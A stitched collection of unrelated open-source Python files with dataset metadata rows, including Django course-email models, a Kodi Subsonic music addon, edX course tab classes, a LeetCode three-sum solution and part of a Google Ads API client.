SEND_TO_STAFF = 'staff'
SEND_TO_ALL = 'all'
SEND_TO_LIST = 'list'
SEND_TO_ALLALL = 'allall'
TO_OPTIONS = [SEND_TO_MYSELF, SEND_TO_STAFF, SEND_TO_LIST, SEND_TO_ALL, SEND_TO_ALLALL]
class Email(models.Model):
"""
Abstract base class for common information for an email.
"""
sender = models.ForeignKey(User, default=1, blank=True, null=True)
slug = models.CharField(max_length=128, db_index=True)
subject = models.CharField(max_length=128, blank=True)
html_message = models.TextField(null=True, blank=True)
text_message = models.TextField(null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta: # pylint: disable=C0111
abstract = True
class CourseEmail(Email):
"""
Stores information for an email to a course.
"""
# Three options for sending that we provide from the instructor dashboard:
# * Myself: This sends an email to the staff member that is composing the email.
#
# * Staff and instructors: This sends an email to anyone in the staff group and
# anyone in the instructor group
#
# * All: This sends an email to anyone enrolled in the course, with any role
# (student, staff, or instructor)
#
TO_OPTION_CHOICES = (
(SEND_TO_MYSELF, 'Myself'),
(SEND_TO_STAFF, 'Staff and instructors'),
(SEND_TO_LIST, 'To list'),
(SEND_TO_ALL, 'All'),
(SEND_TO_ALLALL, 'AllAll')
)
course_id = models.CharField(max_length=255, db_index=True)
location = models.CharField(max_length=255, db_index=True, null=True, blank=True)
to_option = models.CharField(max_length=64, choices=TO_OPTION_CHOICES, default=SEND_TO_MYSELF)
to_list = SeparatedValuesField(null=True)
def __unicode__(self):
return self.subject
@classmethod
def create(cls, course_id, sender, to_option, subject, html_message, text_message=None, location=None, to_list=None):
"""
Create an instance of CourseEmail.
The CourseEmail.save_now method makes sure the CourseEmail entry is committed.
When called from any view that is wrapped by TransactionMiddleware,
and thus in a "commit-on-success" transaction, an autocommit buried within here
will cause any pending transaction to be committed by a successful
save here. Any future database operations will take place in a
separate transaction.
"""
# automatically generate the stripped version of the text from the HTML markup:
if text_message is None:
text_message = html_to_text(html_message)
# perform some validation here:
if to_option not in TO_OPTIONS:
fmt = 'Course email being sent to unrecognized to_option: "{to_option}" for "{course}", subject "{subject}"'
msg = fmt.format(to_option=to_option, course=course_id, subject=subject)
raise ValueError(msg)
# create the task, then save it immediately:
course_email = cls(
course_id=course_id,
sender=sender,
to_option=to_option,
subject=subject,
html_message=html_message,
text_message=text_message,
location=location,
to_list=to_list,
)
course_email.save_now()
return course_email
@transaction.autocommit
def save_now(self):
"""
Writes CourseEmail immediately, ensuring the transaction is committed.
Autocommit annotation makes sure the database entry is committed.
When called from any view that is wrapped by TransactionMiddleware,
and thus in a "commit-on-success" transaction, this autocommit here
will cause any pending transaction to be committed by a successful
save here. Any future database operations will take place in a
separate transaction.
"""
self.save()
def send(self):
from instructor_task.tasks import send_bulk_course_email
from instructor_task.api_helper import submit_task
from instructor.utils import DummyRequest
request = DummyRequest()
request.user = self.sender
email_obj = self
to_option = email_obj.to_option
task_type = 'bulk_course_email'
task_class = send_bulk_course_email
# Pass in the to_option as a separate argument, even though it's (currently)
# in the CourseEmail. That way it's visible in the progress status.
# (At some point in the future, we might take the recipient out of the CourseEmail,
# so that the same saved email can be sent to different recipients, as it is tested.)
task_input = {'email_id': self.id, 'to_option': to_option}
task_key_stub = "{email_id}_{to_option}".format(email_id=self.id, to_option=to_option)
# create the key value by using MD5 hash:
task_key = hashlib.md5(task_key_stub).hexdigest()
return submit_task(request, task_type, task_class, self.course_id, task_input, task_key)
class Optout(models.Model):
"""
Stores users that have opted out of receiving emails from a course.
"""
# Allowing null=True to support data migration from email->user.
# We need to first create the 'user' column with some sort of default in order to run the data migration,
# and given the unique index, 'null' is the best default value.
user = models.ForeignKey(User, db_index=True, null=True)
course_id = models.CharField(max_length=255, db_index=True)
class Meta: # pylint: disable=C0111
unique_together = ('user', 'course_id')
# Defines the tag that must appear in a template, to indicate
# the location where the email message body is to be inserted.
COURSE_EMAIL_MESSAGE_BODY_TAG = '{{message_body}}'
class CourseEmailTemplate(models.Model):
"""
Stores templates for all emails to a course to use.
This is expected to be a singleton, to be shared across all courses.
Initialization takes place in a migration that in turn loads a fixture.
The admin console interface disables add and delete operations.
Validation is handled in the CourseEmailTemplateForm class.
"""
html_template = models.TextField(null=True, blank=True)
plain_template = models.TextField(null=True, blank=True)
@staticmethod
def get_template():
"""
Fetch the current template
If one isn't stored, an exception is thrown.
"""
try:
return CourseEmailTemplate.objects.get()
except CourseEmailTemplate.DoesNotExist:
log.exception("Attempting to fetch a non-existent course email template")
raise
@staticmethod
def _render(format_string, message_body, context):
"""
Create a text message using a template, message body and context.
Convert message body (`message_body`) into an email message
using the provided template. The template is a format string,
which is rendered using format() with the provided `context` dict.
This doesn't insert user's text into template, until such time we can
support proper error handling due to errors in the message body
(e.g. due to the use of curly braces).
Instead, for now, we insert the message body *after* the substitutions
have been performed, so that anything in the message body that might
interfere will be innocently returned as-is.
Output is returned as a unicode string. It is not encoded as utf-8.
Such encoding is left to the email code, which will use the value
of settings.DEFAULT_CHARSET to encode the message.
"""
# If we wanted to support substitution, we'd call:
# format_string = format_string.replace(COURSE_EMAIL_MESSAGE_BODY_TAG, message_body)
result = format_string.format(**context)
# Note that the body tag in the template will now have been
# "formatted", so we need to do the same to the tag being
# searched for.
message_body_tag = COURSE_EMAIL_MESSAGE_BODY_TAG.format()
result = result.replace(message_body_tag, message_body, 1)
# finally, return the result, without converting to an encoded byte array.
return result
def render_plaintext(self, plaintext, context):
"""
Create plain text message.
Convert plain text body (`plaintext`) into plaintext email message using the
stored plain template and the provided `context` dict.
"""
return CourseEmailTemplate._render(self.plain_template, plaintext, context)
def render_htmltext(self, htmltext, context):
"""
Create HTML text message.
Convert HTML text body (`htmltext`) into HTML email message using the
stored HTML template and the provided `context` dict.
"""
return CourseEmailTemplate._render(self.html_template, htmltext, context)
class CourseAuthorization(models.Model):
"""
Enable the course email feature on a course-by-course basis.
"""
# The course that these features are attached to.
course_id = models.CharField(max_length=255, db_index=True, unique=True)
# Whether or not to enable instructor email
email_enabled = models.BooleanField(default=False)
@classmethod
def instructor_email_enabled(cls, course_id):
"""
Returns whether or not email is enabled for the given course id.
If email has not been explicitly enabled, returns False.
"""
# If settings.FEATURES['REQUIRE_COURSE_EMAIL_AUTH'] is
# set to False, then we enable email for every course.
if not settings.FEATURES['REQUIRE_COURSE_EMAIL_AUTH']:
return True
try:
record = cls.objects.get(course_id=course_id)
return record.email_enabled
except cls.DoesNotExist:
return False
def __unicode__(self):
not_en = "Not "
if self.email_enabled:
not_en = ""
return u"Course '{}': Instructor Email {}Enabled".format(self.course_id, not_en)
|
agpl-3.0
| 351,640,386,097,499,400
| 38.153025
| 121
| 0.668606
| false
| 4.14076
| false
| false
| false
|
xsteadfastx/subsonic-xbmc-addon
|
plugin.audio.subsonic/addon.py
|
1
|
11859
|
from operator import itemgetter
import sys
import urllib
import urlparse
sys.path.append('./resources/lib')
import requests
def build_url(query):
return base_url + '?' + urllib.urlencode(dict([k.encode('utf-8'),unicode(v).encode('utf-8')] for k,v in query.items()))
class Subsonic(object):
def __init__(self, url, username, password):
self.url = url
self.username = username
self.password = password
def api(self, method, parameters={'none': 'none'}):
return self.url + '/rest/' + method + '?u=%s&p=enc:%s&v=1.1.0&c=xbmc-subsonic&f=json&' % (
self.username, self.password.encode('hex')) + urllib.urlencode(parameters)
def artist_list(self):
api_url = self.api('getIndexes.view',
parameters={'musicFolderId': '0'})
r = requests.get(api_url)
artists = []
for index in r.json()['subsonic-response']['indexes']['index']:
for artist in index['artist']:
item = {}
item['name'] = artist['name'].encode('utf-8')
item['id'] = artist['id'].encode('utf-8')
artists.append(item)
return artists
def music_directory_list(self, id):
api_url = self.api('getMusicDirectory.view',
parameters={'id': id})
r = requests.get(api_url)
return r.json()['subsonic-response']['directory']['child']
def genre_list(self):
api_url = self.api('getGenres.view')
r = requests.get(api_url)
return sorted(r.json()['subsonic-response']['genres']['genre'],
key=itemgetter('value'))
def albums_by_genre_list(self, genre):
api_url = self.api('getAlbumList.view',
parameters={'type': 'byGenre',
'genre': genre,
'size': '500'})
r = requests.get(api_url)
return r.json()['subsonic-response']['albumList']['album']
def random_songs_by_genre(self, genre):
api_url = self.api('getRandomSongs.view',
parameters={'size': '500',
'genre': genre})
r = requests.get(api_url)
return r.json()['subsonic-response']['randomSongs']['song']
def random_songs_from_to_year(self, from_year, to_year):
api_url = self.api('getRandomSongs.view',
parameters={'size': '500',
'fromYear': from_year,
'toYear': to_year})
r = requests.get(api_url)
return r.json()['subsonic-response']['randomSongs']['song']
def cover_art(self, id):
return self.api('getCoverArt.view', parameters={'id': id})
def main_page():
menu = [{'mode': 'artist_list', 'foldername': 'Artists'},
{'mode': 'genre_list', 'foldername': 'Genres'},
{'mode': 'random_list', 'foldername': 'Random'}]
for entry in menu:
url = build_url(entry)
li = xbmcgui.ListItem(entry['foldername'],
iconImage='DefaultFolder.png')
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def genre_list():
subsonic = Subsonic(subsonic_url, username, password)
genres = subsonic.genre_list()
for genre in genres:
url = build_url({'mode': 'albums_by_genre_list',
'foldername': genre['value']})
li = xbmcgui.ListItem(genre['value'],
iconImage='DefaultFolder.png')
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def albums_by_genre_list():
genre = args.get('foldername', None)
subsonic = Subsonic(subsonic_url, username, password)
albums = subsonic.albums_by_genre_list(genre[0])
for album in albums:
url = build_url({'mode': 'track_list',
'foldername': unicode(album['title']).encode('utf-8'),
'album_id': unicode(album['id']).encode('utf-8')})
li = xbmcgui.ListItem(album['artist'] + ' - ' + album['title'])
li.setIconImage(subsonic.cover_art(album['id']))
li.setThumbnailImage(subsonic.cover_art(album['id']))
li.setProperty('fanart_image', subsonic.cover_art(album['id']))
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def artist_list():
subsonic = Subsonic(subsonic_url, username, password)
artists = subsonic.artist_list()
for artist in artists:
url = build_url({'mode': 'album_list',
'foldername': artist['name'],
'artist_id': artist['id']})
li = xbmcgui.ListItem(artist['name'])
li.setIconImage(subsonic.cover_art(artist['id']))
li.setThumbnailImage(subsonic.cover_art(artist['id']))
li.setProperty('fanart_image', subsonic.cover_art(artist['id']))
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def album_list():
artist_id = args.get('artist_id', None)
subsonic = Subsonic(subsonic_url, username, password)
albums = subsonic.music_directory_list(artist_id[0])
for album in albums:
url = build_url({'mode': 'track_list',
'foldername': unicode(album['title']).encode('utf-8'),
'album_id': unicode(album['id']).encode('utf-8')})
li = xbmcgui.ListItem(album['title'])
li.setIconImage(subsonic.cover_art(album['id']))
li.setThumbnailImage(subsonic.cover_art(album['id']))
li.setProperty('fanart_image', subsonic.cover_art(album['id']))
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def track_list():
album_id = args.get('album_id', None)
subsonic = Subsonic(subsonic_url, username, password)
tracks = subsonic.music_directory_list(album_id[0])
for track in tracks:
url = subsonic.api(
'stream.view',
parameters={'id': track['id'],
'maxBitRate': bitrate,
'format': trans_format})
li = xbmcgui.ListItem(track['title'])
li.setIconImage(subsonic.cover_art(track['id']))
li.setThumbnailImage(subsonic.cover_art(track['id']))
li.setProperty('fanart_image', subsonic.cover_art(track['id']))
li.setProperty('IsPlayable', 'true')
li.setInfo(
type='Music',
infoLabels={'Artist': track['artist'],
'Title': track['title']})
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li)
xbmcplugin.endOfDirectory(addon_handle)
def random_list():
menu = [{'mode': 'random_by_genre_list', 'foldername': 'by Genre'},
{'mode': 'random_from_to_year_list', 'foldername': 'from - to Year'}]
for entry in menu:
url = build_url(entry)
li = xbmcgui.ListItem(entry['foldername'],
iconImage='DefaultFolder.png')
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def random_by_genre_list():
subsonic = Subsonic(subsonic_url, username, password)
genres = subsonic.genre_list()
for genre in genres:
url = build_url({'mode': 'random_by_genre_track_list',
'foldername': genre['value']})
li = xbmcgui.ListItem(genre['value'],
iconImage='DefaultFolder.png')
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def random_by_genre_track_list():
genre = args.get('foldername', None)[0]
subsonic = Subsonic(subsonic_url, username, password)
tracks = subsonic.random_songs_by_genre(genre)
for track in tracks:
url = subsonic.api(
'stream.view',
parameters={'id': track['id'],
'maxBitRate': bitrate,
'format': trans_format})
li = xbmcgui.ListItem(track['artist'] + ' - ' + track['title'])
li.setIconImage(subsonic.cover_art(track['id']))
li.setThumbnailImage(subsonic.cover_art(track['id']))
li.setProperty('fanart_image', subsonic.cover_art(track['id']))
li.setProperty('IsPlayable', 'true')
li.setInfo(
type='Music',
infoLabels={'Artist': track['artist'],
'Title': track['title']})
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li)
xbmcplugin.endOfDirectory(addon_handle)
def random_from_to_year_list():
dialog = xbmcgui.Dialog()
from_year = dialog.input('From Year', type=xbmcgui.INPUT_NUMERIC)
dialog = xbmcgui.Dialog()
to_year = dialog.input('To Year', type=xbmcgui.INPUT_NUMERIC)
subsonic = Subsonic(subsonic_url, username, password)
tracks = subsonic.random_songs_from_to_year(from_year, to_year)
for track in tracks:
url = subsonic.api(
'stream.view',
parameters={'id': track['id'],
'maxBitRate': bitrate,
'format': trans_format})
li = xbmcgui.ListItem(track['artist'] + ' - ' + track['title'])
li.setIconImage(subsonic.cover_art(track['id']))
li.setThumbnailImage(subsonic.cover_art(track['id']))
li.setProperty('fanart_image', subsonic.cover_art(track['id']))
li.setProperty('IsPlayable', 'true')
li.setInfo(
type='Music',
infoLabels={'Artist': track['artist'],
'Title': track['title']})
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li)
xbmcplugin.endOfDirectory(addon_handle)
if __name__ == '__main__':
import xbmcaddon
import xbmcgui
import xbmcplugin
my_addon = xbmcaddon.Addon('plugin.audio.subsonic')
subsonic_url = my_addon.getSetting('subsonic_url')
username = my_addon.getSetting('username')
password = my_addon.getSetting('password')
trans_format = my_addon.getSetting('format')
bitrate = my_addon.getSetting('bitrate')
base_url = sys.argv[0]
addon_handle = int(sys.argv[1])
args = urlparse.parse_qs(sys.argv[2][1:])
xbmcplugin.setContent(addon_handle, 'songs')
mode = args.get('mode', None)
if mode is None:
main_page()
elif mode[0] == 'artist_list':
artist_list()
elif mode[0] == 'album_list':
album_list()
elif mode[0] == 'track_list':
track_list()
elif mode[0] == 'genre_list':
genre_list()
elif mode[0] == 'albums_by_genre_list':
albums_by_genre_list()
elif mode[0] == 'random_list':
random_list()
elif mode[0] == 'random_by_genre_list':
random_by_genre_list()
elif mode[0] == 'random_by_genre_track_list':
random_by_genre_track_list()
elif mode[0] == 'random_from_to_year_list':
random_from_to_year_list()
|
mit
| 1,125,825,423,453,675,600
| 34.71988
| 123
| 0.559912
| false
| 3.752848
| false
| false
| false
|
CCallahanIV/PyChart
|
pychart/pychart_datarender/urls.py
|
1
|
1210
|
"""Url patterns for data render app."""
from django.conf.urls import url
from pychart_datarender.views import (
GalleryView,
DataDetailView,
RenderDetailView,
DataLibraryView,
EditDataView,
EditRenderView,
AddDataView,
AddRenderView,
retrieve_data,
render_data,
save_render,
add_owner_view
)
urlpatterns = [
url(r'^gallery/$', GalleryView.as_view(), name='gallery'),
url(r'^(?P<pk>\d+)/$', DataDetailView.as_view(), name='data_detail'),
url(r'^render/(?P<pk>\d+)/$', RenderDetailView.as_view(), name='render_detail'),
url(r'^(?P<pk>\d+)/edit/$', EditDataView.as_view(), name='data_edit'),
url(r'^render/(?P<pk>\d+)/edit/$', EditRenderView.as_view(), name='render_edit'),
url(r'^render/add/$', AddRenderView.as_view(), name='render_add'),
url(r'^retrieve/(?P<pk>\d+)$', retrieve_data, name="get_data"),
url(r'^retrieve/render/$', render_data, name="get_render"),
url(r'^add/$', AddDataView.as_view(), name='data_add'),
url(r'^add/(?P<pk>\d+)$', add_owner_view, name='add_owner'),
url(r'^library/$', DataLibraryView.as_view(), name='data_library_view'),
url(r'^render/create/$', save_render, name="save_render")
]
|
mit
| -4,373,423,737,442,494,000
| 36.8125
| 85
| 0.628099
| false
| 3.192612
| false
| false
| false
|
lemming52/white_pawn
|
leetcode/q015/solution.py
|
1
|
1080
|
"""
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Note:
The solution set must not contain duplicate triplets.
"""
from typing import Dict, List
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
nums = sorted(nums)
found = {}
results = []
for i, a in enumerate(nums):
j = i + 1
k = len(nums) - 1
if a > 0:
break
while j < k:
b = nums[j]
c = nums[k]
total = a + b + c
if total == 0:
key = f"{a}{b}{c}"
if not key in found:
found[key] = True
results.append([a, b, c])
j += 1
k -= 1
elif total > 0:
k -= 1
else:
j += 1
return results
|
mit
| 6,733,637,827,880,332,000
| 27.243243
| 161
| 0.39537
| false
| 4.42623
| false
| false
| false
|
jbassen/edx-platform
|
lms/djangoapps/courseware/tabs.py
|
1
|
10813
|
"""
This module is essentially a broker to xmodule/tabs.py -- it was originally introduced to
perform some LMS-specific tab display gymnastics for the Entrance Exams feature
"""
from django.conf import settings
from django.utils.translation import ugettext as _, ugettext_noop
from courseware.access import has_access
from courseware.entrance_exams import user_must_complete_entrance_exam
from student.models import UserProfile
from openedx.core.lib.course_tabs import CourseTabPluginManager
from student.models import CourseEnrollment
from xmodule.tabs import CourseTab, CourseTabList, key_checker
from xmodule.tabs import StaticTab
class EnrolledTab(CourseTab):
"""
A base class for any view types that require a user to be enrolled.
"""
@classmethod
def is_enabled(cls, course, user=None):
if user is None:
return True
return bool(CourseEnrollment.is_enrolled(user, course.id) or has_access(user, 'staff', course, course.id))
class CoursewareTab(EnrolledTab):
"""
The main courseware view.
"""
type = 'courseware'
title = ugettext_noop('Courseware')
priority = 10
view_name = 'courseware'
is_movable = False
is_default = False
is_visible_to_sneak_peek = True
class CourseInfoTab(CourseTab):
"""
The course info view.
"""
type = 'course_info'
title = ugettext_noop('Course Info')
priority = 20
view_name = 'info'
tab_id = 'info'
is_movable = False
is_default = False
is_visible_to_sneak_peek = True
@classmethod
def is_enabled(cls, course, user=None):
return True
class SyllabusTab(EnrolledTab):
"""
A tab for the course syllabus.
"""
type = 'syllabus'
title = ugettext_noop('Syllabus')
priority = 30
view_name = 'syllabus'
allow_multiple = True
is_default = False
is_visible_to_sneak_peek = True
@classmethod
def is_enabled(cls, course, user=None):
if not super(SyllabusTab, cls).is_enabled(course, user=user):
return False
return getattr(course, 'syllabus_present', False)
class ProgressTab(EnrolledTab):
"""
The course progress view.
"""
type = 'progress'
title = ugettext_noop('Progress')
priority = 40
view_name = 'progress'
is_hideable = True
is_default = False
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
if not super(ProgressTab, cls).is_enabled(course, user=user):
return False
return not course.hide_progress_tab
class TextbookTabsBase(CourseTab):
"""
Abstract class for textbook collection tabs classes.
"""
# Translators: 'Textbooks' refers to the tab in the course that leads to the course' textbooks
title = ugettext_noop("Textbooks")
is_collection = True
is_default = False
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
return user is None or user.is_authenticated()
@classmethod
def items(cls, course):
"""
A generator for iterating through all the SingleTextbookTab book objects associated with this
collection of textbooks.
"""
raise NotImplementedError()
class TextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all textbook tabs.
"""
type = 'textbooks'
priority = None
view_name = 'book'
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
parent_is_enabled = super(TextbookTabs, cls).is_enabled(course, user)
return settings.FEATURES.get('ENABLE_TEXTBOOK') and parent_is_enabled
@classmethod
def items(cls, course):
for index, textbook in enumerate(course.textbooks):
yield SingleTextbookTab(
name=textbook.title,
tab_id='textbook/{0}'.format(index),
view_name=cls.view_name,
index=index
)
class PDFTextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all PDF textbook tabs.
"""
type = 'pdf_textbooks'
priority = None
view_name = 'pdf_book'
@classmethod
def items(cls, course):
for index, textbook in enumerate(course.pdf_textbooks):
yield SingleTextbookTab(
name=textbook['tab_title'],
tab_id='pdftextbook/{0}'.format(index),
view_name=cls.view_name,
index=index
)
class HtmlTextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all Html textbook tabs.
"""
type = 'html_textbooks'
priority = None
view_name = 'html_book'
@classmethod
def items(cls, course):
for index, textbook in enumerate(course.html_textbooks):
yield SingleTextbookTab(
name=textbook['tab_title'],
tab_id='htmltextbook/{0}'.format(index),
view_name=cls.view_name,
index=index
)
class LinkTab(CourseTab):
"""
Abstract class for tabs that contain external links.
"""
link_value = ''
def __init__(self, tab_dict=None, name=None, link=None):
self.link_value = tab_dict['link'] if tab_dict else link
def link_value_func(_course, _reverse_func):
""" Returns the link_value as the link. """
return self.link_value
self.type = tab_dict['type']
tab_dict['link_func'] = link_value_func
super(LinkTab, self).__init__(tab_dict)
def __getitem__(self, key):
if key == 'link':
return self.link_value
else:
return super(LinkTab, self).__getitem__(key)
def __setitem__(self, key, value):
if key == 'link':
self.link_value = value
else:
super(LinkTab, self).__setitem__(key, value)
def to_json(self):
to_json_val = super(LinkTab, self).to_json()
to_json_val.update({'link': self.link_value})
return to_json_val
def __eq__(self, other):
if not super(LinkTab, self).__eq__(other):
return False
return self.link_value == other.get('link')
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
return True
class ExternalDiscussionCourseTab(LinkTab):
"""
A course tab that links to an external discussion service.
"""
type = 'external_discussion'
# Translators: 'Discussion' refers to the tab in the courseware that leads to the discussion forums
title = ugettext_noop('Discussion')
priority = None
is_default = False
@classmethod
def validate(cls, tab_dict, raise_error=True):
""" Validate that the tab_dict for this course tab has the necessary information to render. """
return (super(ExternalDiscussionCourseTab, cls).validate(tab_dict, raise_error) and
key_checker(['link'])(tab_dict, raise_error))
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
if not super(ExternalDiscussionCourseTab, cls).is_enabled(course, user=user):
return False
return course.discussion_link
class ExternalLinkCourseTab(LinkTab):
"""
A course tab containing an external link.
"""
type = 'external_link'
priority = None
is_default = False # An external link tab is not added to a course by default
allow_multiple = True
@classmethod
def validate(cls, tab_dict, raise_error=True):
""" Validate that the tab_dict for this course tab has the necessary information to render. """
return (super(ExternalLinkCourseTab, cls).validate(tab_dict, raise_error) and
key_checker(['link', 'name'])(tab_dict, raise_error))
class SingleTextbookTab(CourseTab):
"""
A tab representing a single textbook. It is created temporarily when enumerating all textbooks within a
Textbook collection tab. It should not be serialized or persisted.
"""
type = 'single_textbook'
is_movable = False
is_collection_item = True
priority = None
def __init__(self, name, tab_id, view_name, index):
def link_func(course, reverse_func, index=index):
""" Constructs a link for textbooks from a view name, a course, and an index. """
return reverse_func(view_name, args=[unicode(course.id), index])
tab_dict = dict()
tab_dict['name'] = name
tab_dict['tab_id'] = tab_id
tab_dict['link_func'] = link_func
super(SingleTextbookTab, self).__init__(tab_dict)
def to_json(self):
raise NotImplementedError('SingleTextbookTab should not be serialized.')
def get_course_tab_list(request, course):
"""
Retrieves the course tab list from xmodule.tabs and manipulates the set as necessary
"""
user = request.user
is_user_enrolled = user.is_authenticated() and CourseEnrollment.is_enrolled(user, course.id)
xmodule_tab_list = CourseTabList.iterate_displayable(
course,
user=user,
settings=settings,
is_user_authenticated=user.is_authenticated(),
is_user_staff=has_access(user, 'staff', course, course.id),
is_user_enrolled=is_user_enrolled,
is_user_sneakpeek=not UserProfile.has_registered(user),
)
# Now that we've loaded the tabs for this course, perform the Entrance Exam work.
# If the user has to take an entrance exam, we'll need to hide away all but the
# "Courseware" tab. The tab is then renamed as "Entrance Exam".
course_tab_list = []
for tab in xmodule_tab_list:
if user_must_complete_entrance_exam(request, user, course):
# Hide all of the tabs except for 'Courseware'
# Rename 'Courseware' tab to 'Entrance Exam'
if tab.type is not 'courseware':
continue
tab.name = _("Entrance Exam")
course_tab_list.append(tab)
# Add in any dynamic tabs, i.e. those that are not persisted
course_tab_list += _get_dynamic_tabs(course, user)
return course_tab_list
def _get_dynamic_tabs(course, user):
"""
Returns the dynamic tab types for the current user.
Note: dynamic tabs are those that are not persisted in the course, but are
instead added dynamically based upon the user's role.
"""
dynamic_tabs = list()
for tab_type in CourseTabPluginManager.get_tab_types():
if getattr(tab_type, "is_dynamic", False):
tab = tab_type(dict())
if tab.is_enabled(course, user=user):
dynamic_tabs.append(tab)
dynamic_tabs.sort(key=lambda dynamic_tab: dynamic_tab.name)
return dynamic_tabs
|
agpl-3.0
| 6,793,054,819,562,622,000
| 30.896755
| 114
| 0.638121
| false
| 3.950676
| false
| false
| false
|
openpolis/op-verify
|
project/verify/admin.py
|
1
|
2315
|
from django.contrib import admin
from django.core.management import call_command, CommandError
from django.http import StreamingHttpResponse
from .models import Rule, Verification
__author__ = 'guglielmo'
def run_verification(request, id):
response = StreamingHttpResponse(stream_generator(request, id), content_type="text/html")
return response
def stream_generator(request, id):
rule = Rule.objects.get(pk=id)
yield "Verifying rule: %s ... <br/>" % rule # Returns a chunk of the response to the browser
yield " " * 1000
try:
call_command(rule.task, rule_id=rule.pk, verbosity='2', username=request.user.username)
yield " Rule verification terminated. Status: {0}<br/>".format(rule.status)
yield ' Go back to <a href="/admin/verify/rule/{0}">rule page</a>.<br/>'.format(rule.id)
yield " " * 1000
except CommandError as e:
yield " ! %s<br/>" % e
yield " " * 1000
except Exception as e:
yield " ! Error in execution: %s<br/>" % e
yield " " * 1000
class VerificationInline(admin.TabularInline):
model = Verification
extra = 0
exclude = ('csv_report', )
list_display = readonly_fields = ('launch_ts', 'duration', 'outcome', 'user', 'csv_report_link', 'parameters')
def get_queryset(self, request):
return super(VerificationInline, self).get_queryset(request).order_by('-launch_ts')
class RuleAdmin(admin.ModelAdmin):
list_display = ['__unicode__', 'tags', 'status', 'last_launched_at', 'notes']
inlines = [VerificationInline,]
search_fields = ['title', 'tags']
buttons = [
{
'url': 'run_verification',
'textname': 'Run verification',
'func': run_verification,
},
]
def change_view(self, request, object_id, form_url='', extra_context={}):
extra_context['buttons'] = self.buttons
return super(RuleAdmin, self).change_view(request, object_id, form_url, extra_context=extra_context)
def get_urls(self):
from django.conf.urls import patterns, url, include
urls = super(RuleAdmin, self).get_urls()
my_urls = list( (url(r'^(.+)/%(url)s/$' % b, self.admin_site.admin_view(b['func'])) for b in self.buttons) )
return my_urls + urls
admin.site.register(Rule, RuleAdmin)
|
bsd-3-clause
| -7,814,162,677,733,859,000
| 35.746032
| 116
| 0.638013
| false
| 3.639937
| false
| false
| false
|
googleads/google-ads-python
|
google/ads/googleads/v8/services/services/ad_schedule_view_service/client.py
|
1
|
18238
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v8.resources.types import ad_schedule_view
from google.ads.googleads.v8.services.types import ad_schedule_view_service
from .transports.base import AdScheduleViewServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import AdScheduleViewServiceGrpcTransport
class AdScheduleViewServiceClientMeta(type):
"""Metaclass for the AdScheduleViewService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[AdScheduleViewServiceTransport]]
_transport_registry["grpc"] = AdScheduleViewServiceGrpcTransport
def get_transport_class(
cls, label: str = None,
) -> Type[AdScheduleViewServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class AdScheduleViewServiceClient(metaclass=AdScheduleViewServiceClientMeta):
"""Service to fetch ad schedule views."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
